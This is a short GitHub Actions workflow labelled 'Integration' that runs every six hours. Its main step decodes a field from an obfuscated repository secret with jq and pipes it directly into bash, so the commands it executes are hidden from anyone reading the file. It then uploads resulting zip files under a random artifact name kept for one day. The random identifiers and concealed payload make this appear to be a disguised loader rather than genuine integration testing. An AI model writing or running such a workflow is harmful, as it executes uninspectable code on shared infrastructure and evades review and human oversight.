name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '43 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  action:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Begin
        env:
          l56: ${{ secrets.l56 }}
        run: |
          printf '%s' "$l56" | jq -r .fi222 | /bin/bash
          echo $iqkvo10 | jq -r .bugoo2 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: eOEQy3Cv
          path: "*.zip"
          retention-days: 1
